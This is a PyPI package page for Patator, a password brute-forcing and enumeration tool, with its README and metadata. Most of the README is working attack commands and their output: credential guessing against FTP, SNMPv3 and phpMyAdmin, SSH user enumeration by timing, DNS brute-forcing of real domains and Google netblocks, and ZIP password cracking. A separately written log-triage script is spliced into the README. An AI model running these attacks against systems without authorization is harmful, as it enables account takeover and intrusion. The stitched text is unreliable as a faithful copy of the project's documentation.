# Patator
Patator was written out of frustration from using Hydra, Medusa, Ncrack, Metasploit modules and Nmap NSE scripts for password guessing attacks. I opted for a different approach in order to not create yet another brute-forcing tool and avoid repeating the same shortcomings. Patator is a multi-threaded tool written in Python that strives to be more reliable and flexible than its predecessors.
Currently it supports the following modules:
```
* ftp_login : Brute-force FTP
* ssh_login : Brute-force SSH
* telnet_login : Brute-force Telnet
* smtp_login : Brute-force SMTP
* smtp_vrfy : Enumerate valid users using the SMTP VRFY command
* smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
* finger_lookup : Enumerate valid users using Finger
* http_fuzz : Brute-force HTTP/HTTPS
* rdp_gateway : Brute-force RDP Gateway
* ajp_fuzz : Brute-force AJP
* pop_login : Brute-force POP
* pop_passd : Brute-force poppassd (not POP3)
* imap_login : Brute-force IMAP
* ldap_login : Brute-force LDAP
* dcom_login : Brute-force DCOM
* smb_login : Brute-force SMB
* smb_lookupsid : Brute-force SMB SID-lookup
* rlogin_login : Brute-force rlogin
* vmauthd_login : Brute-force VMware Authentication Daemon
* mssql_login : Brute-force MSSQL
* oracle_login : Brute-force Oracle
* mysql_login : Brute-force MySQL
* mysql_query : Brute-force MySQL queries
* rdp_login : Brute-force RDP (NLA)
* pgsql_login : Brute-force PostgreSQL
* vnc_login : Brute-force VNC
* dns_forward : Brute-force DNS
* dns_reverse : Brute-force DNS (reverse lookup subnets)
* ike_enum : Enumerate IKE transforms
* snmp_login : Brute-force SNMPv1/2 and SNMPv3
* unzip_pass : Brute-force the password of encrypted ZIP files
* keystore_pass : Brute-force the password of Java keystore files
* sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases
* umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
```
The name "Patator" comes from [this](https://www.youtube.com/watch?v=9sF9fTALhVA).
Patator is NOT script-kiddie friendly, please read the full README inside [patator.py](patator.py) before reporting.
Please donate if you like this project! :)
[Donate via PayPal](https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=SB36VJH4EM5WG&lc=AU&item_name=lanjelot&item_number=patator&currency_code=AUD&bn=PP%2dDonationsBF%3abtn_donateCC_LG%2egif%3aNonHosted)
Many thanks! [@lanjelot](https://twitter.com/lanjelot)
## Install
```
git clone https://github.com/lanjelot/patator.git
git clone https://github.com/danielmiessler/SecLists.git
docker build -t patator patator/
docker run -it --rm -v $PWD/SecLists/Passwords:/mnt patator dummy_test data=FILE0 0=/mnt/richelieu-french-top5000.txt
```
## Usage Examples
* FTP : Enumerating users denied login in `vsftpd/userlist`
```
$ ftp_login host=10.0.0.1 user=FILE0 0=logins.txt password=asdf -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500
19:36:06 patator INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-02-08 19:36 AEDT
19:36:06 patator INFO -
19:36:06 patator INFO - code size time | candidate | num | mesg
19:36:06 patator INFO - -----------------------------------------------------------------------------
19:36:07 patator INFO - 230 17 0.002 | anonymous | 7 | Login successful.
19:36:07 patator INFO - 230 17 0.001 | ftp | 10 | Login successful.
19:36:08 patator INFO - 530 18 1.000 | root | 1 | Permission denied.
19:36:17 patator INFO - 530 18 1.000 | michael | 50 | Permission denied.
19:36:36 patator INFO - 530 18 1.000 | robert | 93 | Permission denied.
...
```
Tested against `vsftpd-3.0.2-9` on `CentOS 7.0-1406`.
* SSH : Time-based user enumeration
```
$ ssh_login host=10.0.0.1 user=FILE0 0=logins.txt password=$(perl -e "print 'A'x50000") --max-retries 0 --timeout 10 -x ignore:time=0-3
17:45:20 patator INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-02-08 17:45 AEDT
17:45:20 patator INFO -
17:45:20 patator INFO - code size time | candidate | num | mesg
17:45:20 patator INFO - -----------------------------------------------------------------------------
17:45:30 patator FAIL - xxx 41 10.001 | root | 1 | <class '__main__.TimeoutError'> timed out
17:45:34 patator FAIL - xxx 41 10.000 | john | 23 | <class '__main__.TimeoutError'> timed out
17:45:37 patator FAIL - xxx 41 10.000 | joe | 40 | <class '__main__.TimeoutError'> timed out
...
```
Tested against `openssh-server 1:6.0p1-4+deb7u2` on `Debian 7.8`.
* HTTP : Brute-force phpMyAdmin logon
```
$ http_fuzz url=http://10.0.0.1/pma/index.php method=POST body='pma_username=COMBO00&pma_password=COMBO01&server=1&target=index.php&lang=en&token=' 0=combos.txt before_urls=http://10.0.0.1/pma/index.php accept_cookie=1 follow=1 -x ignore:fgrep='Cannot log in to the MySQL server' -l /tmp/qsdf
11:53:47 patator INFO - Starting Patator v0.7-beta (http://code.google.com/p/patator/) at 2014-08-31 11:53 EST
11:53:47 patator INFO -
11:53:47 patator INFO - code size:clen time | candidate | num | mesg
11:53:47 patator INFO - -----------------------------------------------------------------------------
11:53:48 patator INFO - 200 49585:0 0.150 | root:p@ssw0rd | 26 | HTTP/1.1 200 OK
11:53:51 patator INFO - 200 13215:0 0.351 | root: | 72 | HTTP/1.1 200 OK
^C
11:53:54 patator INFO - Hits/Done/Skip/Fail/Size: 2/198/0/0/3000, Avg: 29 r/s, Time: 0h 0m 6s
11:53:54 patator INFO - To resume execution, pass --resume 15,15,15,16,15,36,15,16,15,40
```
Payload #72 was a false positive due to an unexpected error message:
```
$ grep AllowNoPassword /tmp/qsdf/72_200\:13215\:0\:0.351.txt
... class="icon ic_s_error" /> Login without a password is forbidden by configuration (see AllowNoPassword)</div><noscript>
```
Tested against `phpMyAdmin 4.2.7.1`.
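Re-checking hits such as payload #72 can be scripted so that false positives are caught before they are reported. The following is an added example, not part of patator: it parses result rows in the layout shown above, derives the saved-response file name following the one name shown on this page (`72_200:13215:0:0.351.txt`), and flags hits whose saved body contains a known error string. The names `Row`, `parse` and `triage`, the verdict labels and the body of response 26 are constructed for illustration.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# "<clock> patator <LEVEL> - <code> <size> [<time>] | <candidate> | <num> | <mesg>"
ROW = re.compile(
    r"^\d\d:\d\d:\d\d\s+patator\s+(?P<level>[A-Z]+)\s+-\s+"
    r"(?P<stats>[^|]*?)\s*\|\s*(?P<candidate>.*?)\s*\|\s*(?P<num>\d+)\s*\|\s*(?P<mesg>.*)$"
)
SUMMARY = re.compile(r"Hits/Done/Skip/Fail/Size: (\d+)/(\d+)/(\d+)/(\d+)/(\d+)")


@dataclass
class Row:
    level: str            # INFO for a reported hit, FAIL for a request that errored
    code: str             # module-specific status, e.g. "200", "0-0", "xxx"
    size: str             # kept as text because http_fuzz prints "size:clen"
    time: Optional[str]   # absent in the older (v0.5) layout
    candidate: str
    num: int
    mesg: str

    def response_file(self) -> str:
        # Assumption: pattern inferred from the single file name shown on the page.
        parts = [self.code, self.size] + ([self.time] if self.time else [])
        return f"{self.num}_{':'.join(parts)}.txt"


def parse(log: str) -> Tuple[List[Row], Optional[Dict[str, int]]]:
    """Return the result rows and the final Hits/Done/Skip/Fail/Size counters."""
    rows, summary = [], None
    for line in log.splitlines():
        line = line.strip()
        m = ROW.match(line)
        if m:
            stats = m["stats"].split()
            if len(stats) not in (2, 3):
                continue  # not a layout shown on the page; skip rather than guess
            rows.append(Row(m["level"], stats[0], stats[1],
                            stats[2] if len(stats) == 3 else None,
                            m["candidate"], int(m["num"]), m["mesg"]))
            continue
        s = SUMMARY.search(line)
        if s:
            keys = ("hits", "done", "skip", "fail", "size")
            summary = dict(zip(keys, map(int, s.groups())))
    return rows, summary


def triage(rows: List[Row], saved: Dict[str, str],
           error_markers: List[str]) -> Dict[int, str]:
    """Map payload number to a verdict based on the saved response body."""
    verdicts = {}
    for r in rows:
        if r.level != "INFO":
            verdicts[r.num] = "request-failed"
            continue
        body = saved.get(r.response_file())
        if body is None:
            verdicts[r.num] = "unverified"        # no saved response to inspect
        elif any(marker in body for marker in error_markers):
            verdicts[r.num] = "false-positive"    # an error page slipped past the filter
        else:
            verdicts[r.num] = "no-known-error"    # still worth a manual look
    return verdicts


# Rows copied from the http_fuzz run on this page (column spacing as rendered here).
SAMPLE_LOG = """\
11:53:47 patator INFO - code size:clen time | candidate | num | mesg
11:53:47 patator INFO - -----------------------------------------------------------------------------
11:53:48 patator INFO - 200 49585:0 0.150 | root:p@ssw0rd | 26 | HTTP/1.1 200 OK
11:53:51 patator INFO - 200 13215:0 0.351 | root: | 72 | HTTP/1.1 200 OK
^C
11:53:54 patator INFO - Hits/Done/Skip/Fail/Size: 2/198/0/0/3000, Avg: 29 r/s, Time: 0h 0m 6s
"""

# Stand-in for the files written by -l /tmp/qsdf, held in memory so this runs offline.
# The body for 72 is the grep output from the page; the body for 26 is constructed.
SAVED = {
    "26_200:49585:0:0.150.txt": "<html><title>phpMyAdmin</title> (constructed body)</html>",
    "72_200:13215:0:0.351.txt": 'class="icon ic_s_error" /> Login without a password is '
                                "forbidden by configuration (see AllowNoPassword)</div><noscript>",
}
ERROR_MARKERS = ["Cannot log in to the MySQL server", "AllowNoPassword"]

if __name__ == "__main__":
    parsed_rows, counters = parse(SAMPLE_LOG)
    print(counters)
    for num, verdict in triage(parsed_rows, SAVED, ERROR_MARKERS).items():
        print(num, verdict)
```
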
* IKEv1 : Enumerate transforms supported by VPN peer
```
# ike_enum host=10.0.0.1 transform=MOD0 0=TRANS aggressive=RANGE1 1=int:0-1 -x ignore:fgrep='NO-PROPOSAL'
16:52:58 patator INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-04-05 16:52 AEST
16:52:58 patator INFO -
16:52:58 patator INFO - code size time | candidate | num | mesg
16:52:58 patator INFO - -----------------------------------------------------------------------------
16:53:03 patator INFO - 0 70 0.034 | 5,1,1,2:0 | 1539 | Handshake returned: Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK (Main)
16:53:03 patator INFO - 0 72 0.031 | 5,1,65001,2:0 | 1579 | Handshake returned: Enc=3DES Hash=MD5 Group=2:modp1024 Auth=XAUTH&PSK (Main)
16:53:03 patator INFO - 0 76 0.033 | 5,1,1,2:1 | 1540 | Handshake returned: Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK (Aggressive)
16:53:03 patator INFO - 0 78 0.034 | 5,1,65001,2:1 | 1580 | Handshake returned: Enc=3DES Hash=MD5 Group=2:modp1024 Auth=XAUTH&PSK (Aggressive)
16:53:06 patator INFO - 0 84 0.034 | 7/128,2,1,2:0 | 2371 | Handshake returned: Enc=AES KeyLength=128 Hash=SHA1 Group=2:modp1024 Auth=PSK (Main)
16:53:06 patator INFO - 0 90 0.033 | 7/128,2,1,2:1 | 2372 | Handshake returned: Enc=AES KeyLength=128 Hash=SHA1 Group=2:modp1024 Auth=PSK (Aggressive)
16:53:06 patator INFO - 0 86 0.034 | 7/128,2,65001,2:0 | 2411 | Handshake returned: Enc=AES KeyLength=128 Hash=SHA1 Group=2:modp1024 Auth=XAUTH&PSK (Main)
16:53:06 patator INFO - 0 92 0.035 | 7/128,2,65001,2:1 | 2412 | Handshake returned: Enc=AES KeyLength=128 Hash=SHA1 Group=2:modp1024 Auth=XAUTH&PSK (Aggressive)
+ 10.0.0.1:500 (Main Mode)
Encryption Hash Auth Group
---------- ---------- ---------- ----------
3DES MD5 PSK modp1024
3DES MD5 XAUTH&PSK modp1024
AES128 SHA1 PSK modp1024
AES128 SHA1 XAUTH&PSK modp1024
+ 10.0.0.1:500 (Aggressive Mode)
Encryption Hash Auth Group
---------- ---------- ---------- ----------
3DES MD5 PSK modp1024
3DES MD5 XAUTH&PSK modp1024
AES128 SHA1 PSK modp1024
AES128 SHA1 XAUTH&PSK modp1024
16:53:11 patator INFO - Hits/Done/Skip/Fail/Size: 8/3840/0/0/3840, Avg: 284 r/s, Time: 0h 0m 13s
```
* SNMPv3 : Find valid usernames
```
$ snmp_login host=10.0.0.1 version=3 user=FILE0 0=logins.txt -x ignore:mesg=unknownUserName
17:51:06 patator INFO - Starting Patator v0.5
17:51:06 patator INFO -
17:51:06 patator INFO - code size | candidate | num | mesg
17:51:06 patator INFO - ----------------------------------------------------------------------
17:51:11 patator INFO - 0-0 11 | robert | 55 | wrongDigest
17:51:12 patator INFO - Progress: 20% (70/345) | Speed: 10 r/s | ETC: 17:51:38 (00:00:26 remaining)
17:51:33 patator INFO - 0-0 11 | myuser | 311 | wrongDigest
17:51:36 patator INFO - Hits/Done/Skip/Fail/Size: 2/345/0/0/345, Avg: 11 r/s, Time: 0h 0m 30s
```
* SNMPv3 : Find valid passwords
```
$ snmp_login host=10.0.0.1 version=3 user=robert auth_key=FILE0 0=passwords_8+.txt -x ignore:mesg=wrongDigest
17:52:15 patator INFO - Starting Patator v0.5
17:52:15 patator INFO -
17:52:15 patator INFO - code size | candidate | num | mesg
17:52:15 patator INFO - ----------------------------------------------------------------------
17:52:16 patator INFO - 0-0 69 | password123 | 16 | Linux thug 2.6.36-gentoo #5 SMP Fri Aug 12 14:49:51 CEST 2011 i686
17:52:17 patator INFO - Hits/Done/Skip/Fail/Size: 1/50/0/0/50, Avg: 38 r/s, Time: 0h 0m 1s
```
* DNS : Forward lookup
```
$ dns_forward name=FILE0.hsc.fr 0=names.txt -x ignore:code=3
03:18:46 patator INFO - Starting Patator v0.5 (http://code.google.com/p/patator/) at 2012-06-29 03:18 PMT
03:18:46 patator INFO -
03:18:46 patator INFO - code size | candidate | num | mesg
03:18:46 patator INFO - ----------------------------------------------------------------------
03:18:46 patator INFO - 0 41 | www | 4 | NOERROR [www.hsc.fr. IN A 217.174.211.25]
03:18:46 patator INFO - 0 81 | mail | 32 | NOERROR [mail.hsc.fr. IN CNAME itesec.hsc.fr.][itesec.hsc.fr. IN A 192.70.106.33]
03:18:46 patator INFO - 0 44 | webmail | 62 | NOERROR [webmail.hsc.fr. IN A 192.70.106.95]
03:18:46 patator INFO - 0 93 | test | 54 | NOERROR [hsc.fr. IN SOA itesec.hsc.fr. hostmaster.hsc.fr. 2012012301 21600 3600 1209600 3600]
03:18:46 patator INFO - 0 40 | wap | 66 | NOERROR [wap.hsc.fr. IN A 192.70.106.33]
03:18:46 patator INFO - 0 85 | extranet | 131 | NOERROR [extranet.hsc.fr. IN CNAME itesec.hsc.fr.][itesec.hsc.fr. IN A 192.70.106.33]
03:18:46 patator INFO - 0 81 | news | 114 | NOERROR [news.hsc.fr. IN CNAME itesec.hsc.fr.][itesec.hsc.fr. IN A 192.70.106.33]
03:18:46 patator INFO - 0 93 | mailhost | 137 | NOERROR [mailhost.hsc.fr. IN A 192.70.106.33][mailhost.hsc.fr. IN AAAA 2001:7a8:1155:2::abcd]
03:18:46 patator INFO - 0 47 | lists | 338 | NOERROR [lists.hsc.fr. IN MX 10 itesec.hsc.fr.]
03:18:46 patator INFO - 0 93 | fr | 319 | NOERROR [hsc.fr. IN SOA itesec.hsc.fr. hostmaster.hsc.fr. 2012012301 21600 3600 1209600 3600]
03:18:47 patator INFO - 0 40 | gl | 586 | NOERROR [gl.hsc.fr. IN A 192.70.106.103]
Records ------------------------------------------
extranet.hsc.fr. IN CNAME itesec.hsc.fr.
gl.hsc.fr. IN A 192.70.106.103
hsc.fr. IN SOA itesec.hsc.fr. hostmaster.hsc.fr. 2012012301 21600 3600 1209600 3600
itesec.hsc.fr. IN A 192.70.106.33
lists.hsc.fr. IN MX 10 itesec.hsc.fr.
mail.hsc.fr. IN CNAME itesec.hsc.fr.
mailhost.hsc.fr. IN A 192.70.106.33
mailhost.hsc.fr. IN AAAA 2001:7a8:1155:2::abcd
news.hsc.fr. IN CNAME itesec.hsc.fr.
wap.hsc.fr. IN A 192.70.106.33
webmail.hsc.fr. IN A 192.70.106.95
www.hsc.fr. IN A 217.174.211.25
Hostmap ------------------------------------------
mailhost.hsc.fr 2001:7a8:1155:2::abcd
mailhost.hsc.fr 192.70.106.33
wap.hsc.fr 192.70.106.33
itesec.hsc.fr 192.70.106.33
extranet.hsc.fr
mail.hsc.fr
news.hsc.fr
webmail.hsc.fr 192.70.106.95
gl.hsc.fr 192.70.106.103
www.hsc.fr 217.174.211.25
Domains ------------------------------------------
hsc.fr 10
Networks -----------------------------------------
2001:7a8:1155:2::abcd
192.70.106.x
217.174.211.25
03:18:53 patator INFO - Hits/Done/Skip/Fail/Size: 11/1000/0/0/1000, Avg: 133 r/s, Time: 0h 0m 7s
```
Also notice that `test.hsc.fr.` is the start of a new zone because we got NOERROR and no IP address.
* DNS : Reverse lookup two netblocks owned by Google
```
$ dns_reverse host=NET0 0=216.239.32.0-216.239.47.255,8.8.8.0/24 -x ignore:code=3 -x ignore:fgrep!=google.com -x ignore:fgrep=216-239-
03:24:22 patator INFO - Starting Patator v0.5 (http://code.google.com/p/patator/) at 2012-06-29 03:24 PMT
03:24:22 patator INFO -
03:24:22 patator INFO - code size | candidate | num | mesg
03:24:22 patator INFO - ----------------------------------------------------------------------
03:24:22 patator INFO - 0 46 | 216.239.32.10 | 11 | NOERROR [216.239.32.10 IN PTR ns1.google.com.]
03:24:22 patator INFO - 0 45 | 216.239.32.11 | 12 | NOERROR [216.239.32.11 IN PTR ns.google.com.]
03:24:22 patator INFO - 0 48 | 216.239.32.15 | 16 | NOERROR [216.239.32.15 IN PTR time1.google.com.]
03:24:23 patator INFO - 0 47 | 216.239.33.5 | 262 | NOERROR [216.239.33.5 IN PTR proxy.google.com.]
03:24:23 patator INFO - 0 47 | 216.239.33.12 | 269 | NOERROR [216.239.33.12 IN PTR dns1.google.com.]
03:24:23 patator INFO - 0 51 | 216.239.33.22 | 279 | NOERROR [216.239.33.22 IN PTR transfer.google.com.]
03:24:23 patator INFO - 0 50 | 216.239.33.20 | 277 | NOERROR [216.239.33.20 IN PTR esc-out.google.com.]
03:24:23 patator INFO - 0 46 | 216.239.34.10 | 523 | NOERROR [216.239.34.10 IN PTR ns2.google.com.]
03:24:23 patator INFO - 0 48 | 216.239.34.15 | 528 | NOERROR [216.239.34.15 IN PTR time2.google.com.]
^C
Records ------------------------------------------
216.239.32.10 IN PTR ns1.google.com.
216.239.32.11 IN PTR ns.google.com.
216.239.32.15 IN PTR time1.google.com.
216.239.33.12 IN PTR dns1.google.com.
216.239.33.20 IN PTR esc-out.google.com.
216.239.33.22 IN PTR transfer.google.com.
216.239.33.5 IN PTR proxy.google.com.
216.239.34.10 IN PTR ns2.google.com.
216.239.34.15 IN PTR time2.google.com.
Hostmap ------------------------------------------
ns1.google.com 216.239.32.10
ns.google.com 216.239.32.11
time1.google.com 216.239.32.15
proxy.google.com 216.239.33.5
dns1.google.com 216.239.33.12
esc-out.google.com 216.239.33.20
transfer.google.com 216.239.33.22
ns2.google.com 216.239.34.10
time2.google.com 216.239.34.15
Domains ------------------------------------------
google.com 9
Networks -----------------------------------------
216.239.32.x
216.239.33.x
216.239.34.x
03:24:29 patator INFO - Hits/Done/Skip/Fail/Size: 9/872/0/0/4352, Avg: 115 r/s, Time: 0h 0m 7s
03:24:29 patator INFO - To resume execution, pass --resume 91,75,93,73,84,95,94,95,83,89
```
* ZIP : Crack a password-protected ZIP file (older pkzip encryption was previously not supported in JtR)
```
$ unzip_pass zipfile=challenge1.zip password=FILE0 0=rockyou.dic -x ignore:code!=0
10:54:29 patator INFO - Starting Patator v0.5 (http://code.google.com/p/patator/) at 2012-06-29 10:54:29 PMT
10:54:29 patator INFO -
10:54:29 patator INFO - code size | candidate | num | mesg
10:54:29 patator INFO - ----------------------------------------------------------------------
10:54:30 patator INFO - 0 82 | love | 387 | 0 [82] No errors detected in compressed data of challenge1.zip.
^C
10:54:31 patator INFO - Hits/Done/Skip/Fail/Size: 1/1589/0/0/5000, Avg: 699 r/s, Time: 0h 0m 2s
10:54:31 patator INFO - To resume execution, pass --resume 166,164,165,166,155,158,148,158,155,154
```
## PyInstaller
### Bundling on Windows 5.2.3790 x86
Install `python-2.7.9.msi` from [Python](https://www.python.org/downloads/windows/).
Install `pywin32-219.win32-py2.7.exe` from [PyWin32](http://sourceforge.net/projects/pywin32/files/pywin32/).
Install `vcredist_x86.exe` from [Microsoft](http://www.microsoft.com/en-us/download/confirmation.aspx?id=29).
Install `Git-1.9.5.exe` from [Git](http://git-scm.com/download/win) (and select "Use Git from Windows Command Prompt" during install).
Add `c:\Python27;c:\Python27\Scripts` to your `PATH`.
```
pip install pycrypto pyopenssl
pip install impacket
pip install paramiko
pip install IPy
pip install dnspython
pip install pysnmp
cd c:\
git clone https://github.com/lanjelot/patator
git clone https://github.com/pyinstaller/pyinstaller
cd pyinstaller
git checkout a2b0617251ebe70412f6e3573f00a49ce08b7b32 # fixes this issue: https://groups.google.com/forum/#!topic/pyinstaller/6xD75_w4F-c
python pyinstaller.py --clean --onefile c:\patator\patator.py
patator\dist\patator.exe -h
```
The resulting stand-alone `patator.exe` executable was confirmed to run successfully on Windows 2003 (5.2.3790), Windows 7 (6.1.7600), Windows 2008 R2 SP1 (6.1.7601) and Windows 2012 R2 (6.3.9600), and is likely to work fine on other Windows versions.
Refer to [#50](https://github.com/lanjelot/patator/issues/50) for more info.
Raw data
{
"_id": null,
"home_page": null,
"name": "patator",
"maintainer": null,
"docs_url": null,
"requires_python": ">=3.13",
"maintainer_email": null,
"keywords": "brute force, password attack, pentest",
"author": "Sebastien Macke",
"author_email": null,
"download_url": "https://files.pythonhosted.org/packages/37/e4/85e6c8750c5f1928050e5aa029b37986a63e1f0ba13bbede46b7848055ea/patator-1.1.0.tar.gz",
"platform": null,
"bugtrack_url": null,
"license": null,
"summary": "Multi-purpose brute-forcer",
"version": "1.1.0",
"project_urls": {
"Homepage": "https://github.com/lanjelot/patator",
"Issues": "https://github.com/lanjelot/patator/issues"
},
"split_keywords": [
"brute force",
" password attack",
" pentest"
],
"urls": [
{
"comment_text": null,
"digests": {
"blake2b_256": "2ff8c7e7b0a1a919cedd4ea1ffcce04004c1b6b53a7283b8c4cc4d58f20b81ab",
"md5": "19322fffa35b2d7edc58fe0461042224",
"sha256": "764df0f574a27227d5ffa8b4cf9b44656dff01e0986e08dc7ffe5eb549a11a04"
},
"downloads": -1,
"filename": "patator-1.1.0-py3-none-any.whl",
"has_sig": false,
"md5_digest": "19322fffa35b2d7edc58fe0461042224",
"packagetype": "bdist_wheel",
"python_version": "py3",
"requires_python": ">=3.13",
"size": 51798,
"upload_time": "2025-02-17T02:15:29",
"upload_time_iso_8601": "2025-02-17T02:15:29.036659Z",
"url": "https://files.pythonhosted.org/packages/2f/f8/c7e7b0a1a919cedd4ea1ffcce04004c1b6b53a7283b8c4cc4d58f20b81ab/patator-1.1.0-py3-none-any.whl",
"yanked": false,
"yanked_reason": null
},
{
"comment_text": null,
"digests": {
"blake2b_256": "37e485e6c8750c5f1928050e5aa029b37986a63e1f0ba13bbede46b7848055ea",
"md5": "5ed9d5a17b48cc5cba8bf3aa3d4b177c",
"sha256": "06ea41fece07364e835316eb1c1fe89ea792ee42f45ac18f6768ea2948fb0c9c"
},
"downloads": -1,
"filename": "patator-1.1.0.tar.gz",
"has_sig": false,
"md5_digest": "5ed9d5a17b48cc5cba8bf3aa3d4b177c",
"packagetype": "sdist",
"python_version": "source",
"requires_python": ">=3.13",
"size": 57303,
"upload_time": "2025-02-17T02:15:30",
"upload_time_iso_8601": "2025-02-17T02:15:30.833194Z",
"url": "https://files.pythonhosted.org/packages/37/e4/85e6c8750c5f1928050e5aa029b37986a63e1f0ba13bbede46b7848055ea/patator-1.1.0.tar.gz",
"yanked": false,
"yanked_reason": null
}
],
"upload_time": "2025-02-17 02:15:30",
"github": true,
"gitlab": false,
"bitbucket": false,
"codeberg": false,
"github_user": "lanjelot",
"github_project": "patator",
"travis_ci": false,
"coveralls": false,
"github_actions": false,
"requirements": [
{
"name": "paramiko",
"specs": [
[
"==",
"3.5.1"
]
]
},
{
"name": "pycurl",
"specs": [
[
"==",
"7.45.4"
]
]
},
{
"name": "ajpy",
"specs": [
[
"==",
"0.0.5"
]
]
},
{
"name": "impacket",
"specs": [
[
"==",
"0.12.0"
]
]
},
{
"name": "cx_Oracle",
"specs": [
[
"==",
"8.3.0"
]
]
},
{
"name": "mysqlclient",
"specs": [
[
"==",
"2.2.7"
]
]
},
{
"name": "psycopg2-binary",
"specs": [
[
"==",
"2.9.10"
]
]
},
{
"name": "pycryptodomex",
"specs": [
[
"==",
"3.21.0"
]
]
},
{
"name": "dnspython",
"specs": [
[
"==",
"2.7.0"
]
]
},
{
"name": "IPy",
"specs": [
[
"==",
"1.1"
]
]
},
{
"name": "pysnmp",
"specs": [
[
"==",
"7.1.16"
]
]
},
{
"name": "telnetlib-313-and-up",
"specs": [
[
"==",
"3.13.1"
]
]
}
],
"lcname": "patator"
}